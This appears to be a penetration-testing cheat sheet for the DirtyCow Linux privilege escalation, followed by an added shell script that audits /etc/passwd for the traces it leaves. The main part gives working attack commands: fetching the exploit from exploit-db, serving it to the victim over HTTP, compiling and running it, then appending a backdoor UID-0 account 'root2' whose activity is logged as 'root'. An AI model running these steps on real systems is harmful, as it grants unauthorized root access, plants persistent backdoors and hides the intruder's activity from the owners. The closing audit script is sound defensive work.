DirtyCow (CVE-2016-5195)

Usage

Download & share the exploit

cd /home/kali/share
wget -O dirty.c https://www.exploit-db.com/download/40839
python3 -m http.server 80

On the victim

wget -O /tmp/dirty.c http://x.x.x.x/dirty.c

Optional: if the compiler reports that stddef.h (or another header) cannot be found, locate the file and add its directory to PATH

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/src/linux-headers-2.6.31-14/include/linux
gcc -pthread dirty.c -o dirty -lcrypt
chmod u+x dirty
./dirty
[myprecious]
ssh firefart@$IP -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa
[myprecious]

Restore the backup passwd file and add a second root user

mv /tmp/passwd.bak /etc/passwd
echo root2:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd
ssh root2@$IP -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa
[PreciouS]

Activity as root2 will be logged as “root” (not root2).
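A defender-side audit for the traces this procedure leaves in /etc/passwd, added here as an example (not part of the original page or of the exploit's source): a second UID-0 account, and a password hash stored directly in the passwd file instead of the usual "x" pointer to /etc/shadow. The sample files and the hash value are constructed placeholders.

```shell
# Why audit the file itself: getpwuid(0) returns the first UID-0 line, so the
# second root account appears as "root" in logs and `who`/`last` output.

# Print "uid0 <name>" for every UID-0 entry whose name is not "root".
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print "uid0 " $1 }' "$1"
}

# Print "hash <name>" for every entry carrying a real hash in field 2.
# "x", "*", "!" and an empty field are the normal non-hash markers.
inline_hash_accounts() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print "hash " $1 }' "$1"
}

# Run both checks on a passwd-format file; empty output means nothing found.
audit_passwd() {
    extra_uid0_accounts "$1"
    inline_hash_accounts "$1"
}

# Constructed sample files (not from any real host) for a self-test.
CLEAN_PASSWD=$(mktemp)
TAMPERED_PASSWD=$(mktemp)
cat > "$CLEAN_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
EOF
cat > "$TAMPERED_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
root2:$1$placeholderhash:0:0:root:/root:/bin/bash
EOF

audit_passwd "$TAMPERED_PASSWD"
# → uid0 root2
#   hash root2
```

On a live host, run `audit_passwd /etc/passwd` and compare the result against a known-good copy of the file.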